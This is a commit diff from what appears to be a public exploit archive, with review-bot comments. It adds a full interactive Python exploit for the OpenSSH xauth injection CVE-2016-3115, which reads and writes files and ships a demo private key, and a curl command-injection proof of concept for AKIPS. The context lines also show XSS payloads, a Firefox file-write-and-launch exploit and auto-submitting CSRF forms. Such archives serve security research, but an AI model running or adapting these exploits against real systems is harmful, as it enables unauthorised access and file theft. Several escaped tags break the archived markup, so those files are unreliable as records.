/Forms/rpwizard_1 /Forms/rpwizard_1
Details Details
The POST variable wzFirstFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(404565310554)%3B</ScRiPt> . The POST variable wzFirstFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404565310554)%3B</ScRiPt> .
Telephone_select=0&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=</textarea> Telephone_select=0&Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=&lt;/textarea&gt;
################################################################################################################################## ##################################################################################################################################
@ -1958,9 +1958,9 @@ Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=>'><ScRiPt%20%0a%0d>ale
/Forms/rpwizard_1 /Forms/rpwizard_1
Details Details
The POST variable wzFirstFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(404265310550)%3B</ScRiPt> . The POST variable wzFirstFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404265310550)%3B</ScRiPt> .
Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=</textarea><ScRiPt%20%0a%0d>alert(404265310550)%3B</ScRiPt> Telephone_select=0&wzArgentinaNext=Continuar&wzFirstFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(404265310550)%3B</ScRiPt>
################################################################################################################################## ##################################################################################################################################
@ -2014,9 +2014,9 @@ wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwo
/Forms/rpwizPppoe_1 /Forms/rpwizPppoe_1
Details Details
The POST variable wzConnectFlag has been set to </textarea><ScRiPt%20%0a%0d>alert(414035486122)%3B</ScRiPt> . The POST variable wzConnectFlag has been set to &lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(414035486122)%3B</ScRiPt> .
wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwordincleartexthere&wzArgentinaConnect=Conectar&wzArgentinaDisConnect=Desconectar&wzConnectFlag=</textarea><ScRiPt%20%0a%0d>alert(414035486122)%3B</ScRiPt> wzArgen_UserName=usernameincleartexthere%40arnet-for-apb&wzArgen_Password=passwordincleartexthere&wzArgentinaConnect=Conectar&wzArgentinaDisConnect=Desconectar&wzConnectFlag=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(414035486122)%3B</ScRiPt>
################################################################################################################################## ##################################################################################################################################

View file

@ -1,4 +1,3 @@
PenTest Information: PenTest Information:
==================== ====================
GESEC Team (~remove) discover multiple Input Validation Vulnerabilities on Barracuda IM Firewall. GESEC Team (~remove) discover multiple Input Validation Vulnerabilities on Barracuda IM Firewall.
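Review bot: The header records a 4-line to 3-line change, but the three lines shown are identical on both sides, so the removed line is not visible here (presumably a blank first line). The same `-1,4 +1,3` shape repeats across the following unrelated files, which points to a bulk whitespace cleanup. The commit message says only "5 new exploits"; it should mention the cleanup so that edits to existing entries can be told apart from the new additions.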

View file

@ -1,4 +1,3 @@
/* /*
linux/x86-64 bindshell(port 4444) linux/x86-64 bindshell(port 4444)
xi4oyu [at] 80sec.com xi4oyu [at] 80sec.com

View file

@ -1,4 +1,3 @@
/* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT
* *
* 19 October 2005 * 19 October 2005

View file

@ -1,4 +1,3 @@
----------------------------------------------------------------------- -----------------------------------------------------------------------
+ safe-bypass-procopen.txt - yet another way to bypass PHP safe_mode. + + safe-bypass-procopen.txt - yet another way to bypass PHP safe_mode. +
+ By Milen Rangelov <gat3way@gat3way.eu> + + By Milen Rangelov <gat3way@gat3way.eu> +

View file

@ -1,4 +1,3 @@
<!-- <!--
Mozilla Firefox <= 1.0.6 (Host:) Buffer Overflow DoS String Mozilla Firefox <= 1.0.6 (Host:) Buffer Overflow DoS String

View file

@ -1,4 +1,3 @@
/*_------------------------------------------_ /*_------------------------------------------_
||------+ Snort <= 2.4.0 Trigger p0c +------|| ||------+ Snort <= 2.4.0 Trigger p0c +------||
||__________________________________________|| ||__________________________________________||

View file

@ -1,4 +1,3 @@
# #
# Author : Ahmed Obied (ahmed.obied@gmail.com) # Author : Ahmed Obied (ahmed.obied@gmail.com)
# #

View file

@ -1,5 +1,4 @@
Affected Products: Affected Products:
<= PHP 5.2.3 <= PHP 5.2.3
<= PHP 4.4.7 <= PHP 4.4.7

View file

@ -39,7 +39,7 @@ document.getElementById('linkhtml_"+os+"').value",300);
<textarea id="clearhtml" style="display:none"> <textarea id="clearhtml" style="display:none">
<link rel="SHORTCUT ICON" href="favicon.ico"> <link rel="SHORTCUT ICON" href="favicon.ico">
</textarea> &lt;/textarea&gt;
<textarea id="linkhtml_win" style="display:none"> <textarea id="linkhtml_win" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow(' <link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('
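Review bot: The line after `<link rel="SHORTCUT ICON" href="favicon.ico">` was a closing `</textarea>` tag and is now the text `&lt;/textarea&gt;`, so `<textarea id="clearhtml">` is never closed and the `<textarea id="linkhtml_win">` that follows becomes part of its text content instead of a separate element. This looks like the same search-and-replace applied to the scan report earlier in the commit, here hitting real markup rather than a quoted payload, and it means the archived file no longer matches what was originally published. Revert the substitution in this file; the closing tags in the next three hunks have the same problem.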
@ -50,7 +50,7 @@ nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/net
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream); file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\n outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\n
PAUSE\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch();','','')"> PAUSE\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch();','','')">
</textarea> &lt;/textarea&gt;
<textarea id="linkhtml_mac" style="display:none"> <textarea id="linkhtml_mac" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript: <link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:
@ -61,7 +61,7 @@ NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream); file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
outputStream.init(file,0x04|0x08|0x20,420,0);output=\'booom!\';outputStream.write outputStream.init(file,0x04|0x08|0x20,420,0);output=\'booom!\';outputStream.write
(output,output.length);outputStream.close();','','')"> (output,output.length);outputStream.close();','','')">
</textarea> &lt;/textarea&gt;
<textarea id="linkhtml_linux" style="display:none"> <textarea id="linkhtml_linux" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript: <link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:
@ -72,7 +72,7 @@ NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream); file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
outputStream.init(file,0x04|0x08|0x20,420,0);output=\'booom!\';outputStream.write outputStream.init(file,0x04|0x08|0x20,420,0);output=\'booom!\';outputStream.write
(output,output.length);outputStream.close();','','')"> (output,output.length);outputStream.close();','','')">
</textarea> &lt;/textarea&gt;
<br><br> <br><br>
<a href="#" onclick="runDemo();runDemo();">Run exploit</a> <a href="#" onclick="runDemo();runDemo();">Run exploit</a>
</div> </div>

View file

@ -0,0 +1,498 @@
'''
Author: <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
Version: 0.2
Date: Mar 3rd, 2016
Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass
Overview
--------
Name: openssh
Vendor: OpenBSD
References: * http://www.openssh.com/[1]
Version: 7.2p1 [2]
Latest Version: 7.2p1
Other Versions: <= 7.2p1 (all versions; dating back ~20 years)
Platform(s): linux
Technology: c
Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-3115
Description
---------
quote website [1]
> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.
Summary
-------
An authenticated user may inject arbitrary xauth commands by sending an
x11 channel request that includes a newline character in the x11 cookie.
The newline acts as a command separator to the xauth binary. This attack requires
the server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.
By injecting xauth commands one gains limited* read/write arbitrary files,
information leakage or xauth-connect capabilities. These capabilities can be
leveraged by an authenticated restricted user - e.g. one with the login shell
configured as /bin/false or one with configured forced-commands - to bypass
account restriction. This is generally not expected.
The injected xauth commands are performed with the effective permissions of the
logged in user as the sshd already dropped its privileges.
Quick-Info:
* requires: X11Forwarding yes
* bypasses /bin/false and forced-commands
** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)
* does not bypass /bin/nologin (as there is special treatment for this)
Capabilities (xauth):
* Xauth
* write file: limited chars, xauthdb format
* read file: limit lines cut at first \s
* infoleak: environment
* connect to other devices (may allow port probing)
PoC see ref github.
Patch see ref github.
Details
-------
// see annotated code below
* server_input_channel_req (serverloop.c)
*- session_input_channel_req:2299 (session.c [2])
*- session_x11_req:2181
* do_exec_pty or do_exec_no_pty
*- do_child
*- do_rc_files (session.c:1335 [2])
Upon receiving an `x11-req` type channel request sshd parses the channel request
parameters `auth_proto` and `auth_data` from the client ssh packet where
`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)
and `auth_data` contains the actual x11 auth cookie. This information is stored
in a session specific datastore. When calling `execute` on that session, sshd will
call `do_rc_files` which tries to figure out if this is an x11 call by evaluating
if `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND
there is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc`
is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.
Note that `auth_data` nor `auth_proto` was sanitized or validated, it just contains
user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a
command-separator to the `xauth` binary, this allows a client to inject arbitrary
`xauth` commands.
Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted
input as arguments to that script.
Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]
This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth
command injection:
SYNOPSIS
xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]
add displayname protocolname hexkey
generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]
[n]extract filename displayname...
[n]list [displayname...]
[n]merge [filename...]
remove displayname...
source filename
info
exit
quit
version
help
?
Interesting commands are:
info - leaks environment information / path
~# xauth info
xauth: file /root/.Xauthority does not exist
Authority file: /root/.Xauthority
File new: yes
File locked: no
Number of entries: 0
Changes honored: yes
Changes made: no
Current input: (argv):1
source - arbitrary file read (cut on first `\s`)
# xauth source /etc/shadow
xauth: file /root/.Xauthority does not exist
xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::"
extract - arbitrary file write
* limited characters
* in xauth.db format
* since it is not compressed it can be combined with `xauth add` to
first store data in the database and then export it to an arbitrary
location e.g. to plant a shell or do other things.
generate - connect to <ip>:<port> (port probing, connect back and pot. exploit
vulnerabilities in X.org
Source
------
Inline annotations are prefixed with `//#!`
/*
* Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found
* first in this order).
*/
static void
do_rc_files(Session *s, const char *shell)
{
...
snprintf(cmd, sizeof cmd, "%s -q -",
options.xauth_location);
f = popen(cmd, "w"); //#! run xauth -q -
if (f) {
fprintf(f, "remove %s\n", //#! remove <user_tainted_data> - injecting \n auth_display injects xauth command
s->auth_display);
fprintf(f, "add %s %s %s\n", //#! \n injection
s->auth_display, s->auth_proto,
s->auth_data);
pclose(f);
} else {
fprintf(stderr, "Could not run %s\n",
cmd);
}
}
}
Proof of Concept
----------------
Prerequisites:
* install python 2.7.x
* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x
* make sure `poc.py`
Usage: <host> <port> <username> <password or path_to_privkey>
path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
poc:
1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user1/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box
#cat /etc/passwd
user2:x:1001:1002:,,,:/home/user2:/bin/false
2. run sshd with `X11Forwarding yes` (kali default config)
#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d
3. `forced-commands` - connect with user1 and display env information
#> python <host> 22 user1 .demoprivkey
INFO:__main__:add this line to your authorized_keys file:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
INFO:__main__:connecting to: user1:<PKEY>@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .info
DEBUG:__main__:auth_cookie: '\ninfo'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:Authority file: /home/user1/.Xauthority
File new: no
File locked: no
Number of entries: 1
Changes honored: yes
Changes made: no
Current input: (stdin):3
/usr/bin/xauth: (stdin):2: bad "add" command line
...
4. `forced-commands` - read `/etc/passwd`
...
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
5. `forced-commands` - write `/tmp/testfile`
#> .writefile /tmp/testfile `thisisatestfile`
DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:/usr/bin/xauth: (stdin):2: bad "add" command line
#> ls -lsat /tmp/testfile
4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile
#> cat /tmp/testfile
\FA65500hi\FA65500`thisisatestfile`\AA
6. `/bin/false` - connect and read `/etc/passwd`
#> python <host> 22 user2 user2password
INFO:__main__:connecting to: user2:user2password@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
user2:x:1001:1002:,,,:/home/user2:/bin/false
...
7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100
#> generate 8.8.8.8:100 .
#> tcpdump
IP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0
Mitigation / Workaround
------------------------
* disable x11-forwarding: `sshd_config` set `X11Forwarding no`
* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`
Notes
-----
Verified, resolved and released within a few days. very impressive.
Vendor response: see advisory [5]
References
----------
[1] http://www.openssh.com/
[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388
[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376
[4] http://linux.die.net/man/1/xauth
[5] http://www.openssh.com/txt/x11fwd.adv
'''
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : <github.com/tintinweb>
###############################################################################
#
# FOR DEMONSTRATION PURPOSES ONLY!
#
###############################################################################
import logging
import StringIO
import sys
import os
LOGGER = logging.getLogger(__name__)
try:
import paramiko
except ImportError, ie:
logging.exception(ie)
logging.warning("Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko")
sys.exit(1)
class SSHX11fwdExploit(object):
def __init__(self, hostname, username, password, port=22, timeout=0.5,
pkey=None, pkey_pass=None):
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if pkey:
pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass)
self.ssh.connect(hostname=hostname, port=port,
username=username, password=password,
timeout=timeout, banner_timeout=timeout,
look_for_keys=False, pkey=pkey)
def exploit(self, cmd="xxxx\n?\nsource /etc/passwd\n"):
transport = self.ssh.get_transport()
session = transport.open_session()
LOGGER.debug("auth_cookie: %s"%repr(cmd))
session.request_x11(auth_cookie=cmd)
LOGGER.debug("dummy exec returned: %s"%session.exec_command(""))
transport.accept(0.5)
session.recv_exit_status() # block until exit code is ready
stdout, stderr = [],[]
while session.recv_ready():
stdout.append(session.recv(4096))
while session.recv_stderr_ready():
stderr.append(session.recv_stderr(4096))
session.close()
return ''.join(stdout)+''.join(stderr) # catch stdout, stderr
def exploit_fwd_readfile(self, path):
data = self.exploit("xxxx\nsource %s\n"%path)
if "unable to open file" in data:
raise IOError(data)
ret = []
for line in data.split('\n'):
st = line.split('unknown command "',1)
if len(st)==2:
ret.append(st[1].strip(' "'))
return '\n'.join(ret)
def exploit_fwd_write_(self, path, data):
'''
adds display with protocolname containing userdata. badchars=<space>
'''
dummy_dispname = "127.0.0.250:65500"
ret = self.exploit('\nadd %s %s aa'%(dummy_dispname, data))
if ret.count('bad "add" command line')>1:
raise Exception("could not store data most likely due to bad chars (no spaces, quotes): %s"%repr(data))
LOGGER.debug(self.exploit('\nextract %s %s'%(path,dummy_dispname)))
return path
demo_authorized_keys = '''#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
'''
PRIVKEY = """-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----"""
if __name__=="__main__":
logging.basicConfig(loglevel=logging.DEBUG)
LOGGER.setLevel(logging.DEBUG)
if not len(sys.argv)>4:
print """ Usage: <host> <port> <username> <password or path_to_privkey>
path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
"""
sys.exit(1)
hostname, port, username, password = sys.argv[1:]
port = int(port)
pkey = None
if os.path.isfile(password):
password = None
with open(password,'r') as f:
pkey = f.read()
elif password==".demoprivkey":
pkey = PRIVKEY
password = None
LOGGER.info("add this line to your authorized_keys file: \n%s"%demo_authorized_keys)
LOGGER.info("connecting to: %s:%s@%s:%s"%(username,password if not pkey else "<PKEY>", hostname, port))
ex = SSHX11fwdExploit(hostname, port=port,
username=username, password=password,
pkey=pkey,
timeout=10
)
LOGGER.info("connected!")
LOGGER.info ("""
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
""")
while True:
cmd = raw_input("#> ").strip()
if cmd.lower().startswith(".exit") or cmd.lower().startswith(".quit"):
break
elif cmd.lower().startswith(".info"):
LOGGER.info(ex.exploit("\ninfo"))
elif cmd.lower().startswith(".readfile"):
LOGGER.info(ex.exploit_fwd_readfile(cmd.split(" ",1)[1]))
elif cmd.lower().startswith(".writefile"):
parts = cmd.split(" ")
LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:])))
else:
LOGGER.info(ex.exploit('\n%s'%cmd))
# just playing around
#print ex.exploit_fwd_readfile("/etc/passwd")
#print ex.exploit("\ninfo")
#print ex.exploit("\ngenerate <ip>:600<port> .") # generate <ip>:port port=port+6000
#print ex.exploit("\nlist")
#print ex.exploit("\nnlist")
#print ex.exploit('\nadd xx xx "\n')
#print ex.exploit('\ngenerate :0 . data "')
#print ex.exploit('\n?\n')
#print ex.exploit_fwd_readfile("/etc/passwd")
#print ex.exploit_fwd_write_("/tmp/somefile", data="`whoami`")
LOGGER.info("--quit--")
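Review bot: `PRIVKEY` and `demo_authorized_keys` near the end of the script embed an RSA private key next to its `authorized_keys` line, and the `.demoprivkey` branch logs "add this line to your authorized_keys file" without saying on which host. Anyone with this repository holds that private key, so a machine that keeps the line installed accepts their logins. The prerequisites should say the demo key is for a disposable test host only and must be removed afterwards, or the script should create a fresh key pair per run. Two smaller points: the prerequisite "make sure `poc.py`" is cut off mid-sentence, and in `__main__` the key-file branch assigns `password = None` before `open(password,'r')`, so that branch cannot read the file it was given.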

View file

@ -75,7 +75,7 @@ function info()
10-01-09 00:24:28,WARNING,Info,SERVER, Default VirtualServer created 10-01-09 00:24:28,WARNING,Info,SERVER, Default VirtualServer created
10-01-09 00:24:28,WARNING,Info,SERVER, admin account info: username: admin password: kcqy8y 10-01-09 00:24:28,WARNING,Info,SERVER, admin account info: username: admin password: kcqy8y
10-01-09 00:24:28,WARNING,Info,SERVER, superadmin account info: username: superadmin password: e7em45 10-01-09 00:24:28,WARNING,Info,SERVER, superadmin account info: username: superadmin password: e7em45
10-01-09 00:24:29,ALL,Info,server, Server init finished</textarea></form>'; 10-01-09 00:24:29,ALL,Info,server, Server init finished&lt;/textarea&gt;</form>';
} }
function head() function head()
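Review bot: the changed line at the end of the `info()` string replaces the literal `</textarea>` with `&lt;/textarea&gt;`, so the markup this function emits no longer closes its textarea and the `</form>` that follows becomes textarea text. The same substitution recurs in later hunks of this commit. If the aim is to stop archived files from breaking the page that displays them, escape at render time and keep the stored file byte-for-byte as submitted.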
@ -127,7 +127,7 @@ if (isset($_GET['go_fuck']))
if (isset($_POST['parampampam'])) if (isset($_POST['parampampam']))
{ {
echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>'; echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'&lt;/textarea&gt;';
html(); html();
} }

View file

@ -430,13 +430,13 @@ CSRF -
<h3>Detailed information</h3> <h3>Detailed information</h3>
<textarea cols="60" id="user_details" name="user[details]" rows="5"></textarea> <textarea cols="60" id="user_details" name="user[details]" rows="5">&lt;/textarea&gt;
<p>Optional detailed information concerning this user, e.g. an address. This information is visible to agents only, never to end-users.</p> <p>Optional detailed information concerning this user, e.g. an address. This information is visible to agents only, never to end-users.</p>
<h3>Notes</h3> <h3>Notes</h3>
<textarea cols="60" id="user_notes" name="user[notes]" rows="5"></textarea> <textarea cols="60" id="user_notes" name="user[notes]" rows="5">&lt;/textarea&gt;
<p>Optional notes concerning this user. Notes can also be added/edited for a requester directly on the ticket form page.<br/>Notes are visible to agents only, never to any end-user.</p> <p>Optional notes concerning this user. Notes can also be added/edited for a requester directly on the ticket form page.<br/>Notes are visible to agents only, never to any end-user.</p>

View file

@ -1,4 +1,3 @@
## ##
# This file is part of the Metasploit Framework and may be redistributed # This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the # according to the licenses defined in the Authors field below. In the
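Review bot: the header `-1,4 +1,3` drops one line from the top of this file, yet the three lines shown are identical on both sides, so the edit appears to be whitespace-only, and the same header repeats across dozens of files in this commit. Move this bulk cleanup into its own commit so the five new exploit files the commit message announces can be reviewed without it.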

View file

@ -1,4 +1,3 @@
## ##
# This file is part of the Metasploit Framework and may be redistributed # This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the # according to the licenses defined in the Authors field below. In the

View file

@ -0,0 +1,46 @@
# Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection
# Date: 03-14-2016
# Exploit Author: BrianWGray
# Contact: https://twitter.com/BrianWGray
# WebPage: http://somethingbroken.com/
# Vendor Homepage: https://www.akips.com/
# Software Link: https://www.akips.com/showdoc/download
# Version: 15.37 through 16.5, May impact earlier versions, remediated in 16.6
# Tested on: FreeBSD 10.2-RELEASE-p7
# CVE : N/A
1. Description
The "username" login parameter allows for OS Command injection via command Injection during a failed login attempt returns the command injection output to a limited login failure field.
By using concatenation '||' a command may be appended to the username.
The vendor has stated the following:
"Apparently the issue is in a Perl module which does an open2() of a
custom PAM program. The command is not being properly sanitised." - Vendor Reply
http://somethingbroken.com/vuln/0002.html
2. Proof of Concept
example request:
curl 'https://Application/' --data 'username=%7C%7C+whoami&password=' --compressed --insecure -# | grep -wF "Error signing in:"
example response:
<div class="alert alert-warning"><strong>Error signing in:</strong> akips</div>
3. Solution:
Update to version 16.6
https://www.akips.com/showdoc/download
4. Timeline:
* 03-14-2016: Discovered, Vendor Notified, Vendor Response
* 03-15-2016: Vendor Releases Remediated Build 16.6
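Review bot: the `# Exploit Title:` line gives the range as "15.37-16.6" while `# Version:` says "15.37 through 16.5 ... remediated in 16.6" and the Solution is "Update to version 16.6", so the title marks the fixed build as affected; change the title range to end at 16.5. The first sentence of the Description also runs two clauses together ("via command Injection during a failed login attempt returns ...") and should be split so it states plainly that the output of the injected command is reflected in the login failure field, which is what a defender would search for in responses.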

View file

@ -276,7 +276,7 @@ admin with default username 'admin' (you can't change that in admin panel or any
<select name="theme"> <select name="theme">
<option value="pedja" selected>pedja</option> <option value="pedja" selected>pedja</option>
</select> </select>
<textarea name="about">I have been hacked</textarea> <textarea name="about">I have been hacked&lt;/textarea&gt;
<input type="submit" value="Snimi promene" name="submit" id="submitButton"> <input type="submit" value="Snimi promene" name="submit" id="submitButton">
</form> </form>
<script>document.forms[0].submit.click();</script> <script>document.forms[0].submit.click();</script>

View file

@ -49,7 +49,7 @@ and i found some sweet CSRF exploits in admin panel.
<select name='lists'> <select name='lists'>
<option value='0' selected>All</option> <option value='0' selected>All</option>
</select> </select>
<textarea name='nletter' rows='8' cols='60' id='7'>Mail message here</textarea> <textarea name='nletter' rows='8' cols='60' id='7'>Mail message here&lt;/textarea&gt;
<input type='submit' name='submit' value='submit'> <input type='submit' name='submit' value='submit'>
</form> </form>

View file

@ -1,4 +1,3 @@
PenTest Information: PenTest Information:
==================== ====================
GESEC Team(~smash & ~rem0ve) discover a SQL Injection Vulnerability on Pandora FMS Monitoring Software. GESEC Team(~smash & ~rem0ve) discover a SQL Injection Vulnerability on Pandora FMS Monitoring Software.

View file

@ -1,4 +1,3 @@
Joomla Component com_schools SQL injection Joomla Component com_schools SQL injection
author:Mr.tro0oqy author:Mr.tro0oqy
email:t.4@windowslive.com email:t.4@windowslive.com

View file

@ -1,4 +1,3 @@
[+] B2B Trading Marketplace SQL Injection Vulnerability [+] B2B Trading Marketplace SQL Injection Vulnerability
[+] Software : B2B Trading Marketplace Script [+] Software : B2B Trading Marketplace Script

View file

@ -1,4 +1,3 @@
|| || | || || || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( . ( : / (_) / ( .

View file

@ -1,4 +1,3 @@
|| || | || || || | ||
